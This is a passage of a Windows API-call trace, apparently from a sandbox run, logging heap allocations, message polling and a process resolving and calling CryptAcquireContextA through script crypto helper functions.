[0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0237.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0237.573] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0237.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0237.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0237.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0237.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0237.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0237.575] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0237.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0237.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0237.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a48 [0237.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0237.576] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0237.576] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0237.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0237.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0237.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.589] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0237.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0237.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0237.590] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.590] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0237.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0237.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0237.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0237.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0237.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0237.591] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.591] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0237.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0237.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0237.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.592] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0237.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0237.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0237.592] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0237.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.593] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0237.593] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0237.593] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: 